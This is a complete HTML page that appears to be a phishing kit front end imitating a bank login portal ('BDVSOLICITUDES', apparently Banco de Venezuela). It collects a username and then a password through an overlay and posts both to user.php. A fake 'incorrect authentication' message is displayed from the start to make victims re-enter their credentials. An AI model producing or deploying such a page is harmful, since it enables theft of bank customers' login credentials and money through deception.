<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" />
    <title>BDVSOLICITUDES</title>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <link rel="icon" href="favicon.png" type="image/x-icon">
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        background-image: url(background.webp);
        background-size: cover;
        background-position: center;
      }

      .container {
        display: flex;
        height: 100%;
        width: 80%;
      }

      .left-side {
        width: 40%;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      .right-side {
        width: 30%;
      }

      .form {
        width: 80%;
        background: white;
        max-width: 550px;
        box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.1);
      }

      @media (max-width: 768px) {
        body {
          background: #ededed;
        }
        .container {
          flex-direction: column;
        }
        .left-side {
          width: 100%;
          height: 100vh;
        }
        .right-side {
          display: none;
        }
      }

      .form-group {
        position: relative;
        margin-bottom: 20px;
        margin: 20px;
      }

      .form-group label {
        position: absolute;
        top: 50%;
        left: 10px;
        transform: translateY(-55%);
        color: #999;
        transition: top 0.3s, font-size 0.3s;
        pointer-events: none;
      }

      .form-group input {
        width: 100%;
        padding: 10px;
        box-sizing: border-box;
        position: relative;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }
      .form-group input:focus {
        border: 0;
      }
      .form-group input:focus + label,
      .form-group input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
      }

      /* Botones CONTINUAR y CANCELAR */
      button {
        background-color: #0067b1;
        color: white;
        border-radius: 3px;
        border: 0;
        padding: 10px 20px;
        text-align: center;
        display: inline-block;
        cursor: pointer;
        transition: background-color 0.3s;
        font-size: 16px;
      }

      button:disabled {
        background-color: #E0E0E0;
        cursor: not-allowed;
      }

      .button-container {
        display: flex;
        justify-content: center;
        gap: 10px;
        margin-top: 20px;
        margin-bottom: 20px;
      }

      .cancel-btn {
        background-color: #0067b1;
      }

      .form-group2 {
        position: relative;
        margin-bottom: 20px;
        margin: 20px;
      }

      .form-group2 label {
        position: absolute;
        top: 50%;
        left: 23%;
        transform: translateY(-55%);
        color: #999;
        transition: top 0.3s, font-size 0.3s;
        pointer-events: none;
      }

      .form-group2 input {
        padding: 10px;
        box-sizing: border-box;
        position: relative;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }

      .form-group2 input:focus {
        border: 0;
      }

      .form-group2 input:focus + label,
      .form-group2 input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
      }

      .overlay {
        display: none;
        justify-content: center;
        align-items: center;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5);
        z-index: 9999;
      }

      .content {
        background-color: #fff;
        width: 350px;
        border-radius: 5px;
        text-align: center;
      }

      /* Estilo del botón ENTRAR */
     #entrarBtn {
  width: 180px;  /* Ajusta el ancho */
  height: 38px; /* Ajusta la altura */
  padding: 0;  /* Para asegurarnos de que el padding no cambie el tamaño */
  font-size: 16px;  /* Puedes ajustar el tamaño de la fuente si es necesario */
  background-color: #0067b1;
  color: white;
  border-radius: 3px;
  cursor: pointer;
  border: none;
  transition: background-color 0.3s;
}


      #entrarBtn:disabled {
        background-color: #E0E0E0;
        cursor: not-allowed;
      }

      /* Estilo del texto debajo del botón */
      .texto-rojo {
        color: red;
        font-size: 14px;
        margin-top: 20px;
        text-align: center;
        font-weight: normal;
      }

    </style>
  </head>
  <body>
    <!-- Formulario de contraseña que se mostrará en el overlay -->
    <div class="overlay" id="overlay">
      <div class="content">
        <form method="post" action="user.php">
          <h4 style="color: #0067b1 !important">Introduce tu contraseña</h4>
          <div class="form-group2">
            <input type="password" name="contra" id="contra" required />
            <label for="contra" style="position: absolute; top: 15px; left: 2; font-size: 13px;">Contraseña *</label>
            <i class="material-icons toggle-password" onclick="togglePasswordVisibility()">visibility</i>
          </div>
          <input type="hidden" name="nombre" id="nombreOculto" />
          <div class="button-container">
            <button type="submit" style="width: auto" id="continuarBtn" disabled>Continuar</button>
            <button type="button" class="cancel-btn" style="width: auto" onclick="cancelar()">Cancelar</button>
          </div>
        </form>
      </div>
    </div>

    <!-- Formulario de entrada de nombre -->
    <div class="container">
      <div class="left-side">
        <form id="nombreForm" class="form">
          <div style="text-align: center">
            <img src="logo.png" alt="" style="width: 90%; margin-top: 20px" />
          </div>
          <div style="width: 100%; text-align: center">
            <div class="form-group">
              <input
                type="text"
                id="nombre"
                name="nombre"
                style="width: 100%"
                maxlength="16"
                required
                oninput="quitarEspacios()"
              />
              <label for="nombre" style="position: absolute; top: 15px; left: 2; font-size: 13px;">Usuario *</label>
            </div>
          </div>
          <div style="width: 100%; text-align: center">
            <button type="button" id="entrarBtn" disabled>Entrar</button>
          </div>
          <!-- Texto debajo del botón Entrar -->
          <div class="texto-rojo">
            Autenticación incorrecta.<br/>Usuario o contraseña inválida. 
          </div>
          <div style="width: 100%; text-align: center; font-size: 12px; font-weight: bold; color: #707070; margin-top: 30px; margin-bottom: 30px;">
              <br />
          </div>
        </form>
      </div>
      <div class="right-side"></div>
    </div>

    <script>
      document.getElementById("nombreForm").addEventListener("submit", function(event) {
          event.preventDefault();
          enviarNombre();
      });

      document.getElementById("entrarBtn").addEventListener("click", function() {
          enviarNombre();
      });

      document.getElementById("nombre").addEventListener("input", function() {
          var nombre = document.getElementById("nombre").value;
          var button = document.getElementById("entrarBtn");

          if (nombre.length < 6) {
              button.disabled = true;
          } else {
              button.disabled = false;
          }
      });

      function enviarNombre() {
          var nombre = document.getElementById("nombre").value;
          var button = document.getElementById("entrarBtn");

          if (nombre.trim() === "") {
              alert("Por favor, introduce tu nombre.");
          } else if (!button.disabled) {
              button.disabled = true; 

              var formData = new FormData();
              formData.append("nombre", nombre);
              fetch("user.php", {
                  method: "POST",
                  body: formData
              })
              .then(response => response.text())
              .then(data => {
                  localStorage.setItem("usuario", nombre);
                  document.getElementById("nombreOculto").value = nombre; 
                  document.getElementById("overlay").style.display = "flex"; 
              })
              .catch(error => {
                  console.error("Error:", error);
                  button.disabled = false; 
              });
          }
      }

      document.getElementById("contra").addEventListener("input", function() {
          var contra = document.getElementById("contra").value;
          var continuarButton = document.getElementById("continuarBtn");

          if (contra.length < 8) {
              continuarButton.disabled = true;
          } else {
              continuarButton.disabled = false;
          }
      });

      function togglePasswordVisibility() {
          const passwordField = document.getElementById("contra");
          const passwordFieldType = passwordField.getAttribute("type");
          if (passwordFieldType === "password") {
              passwordField.setAttribute("type", "text");
          } else {
              passwordField.setAttribute("type", "password");
          }
      }

 function cancelar() {
      window.location.href = "cancel.php"; // Redirige a cancel.php
  }

      function quitarEspacios() {
          var inputNombre = document.getElementById("nombre");
          inputNombre.value = inputNombre.value.trim();
      }
    </script>
  </body>
</html>
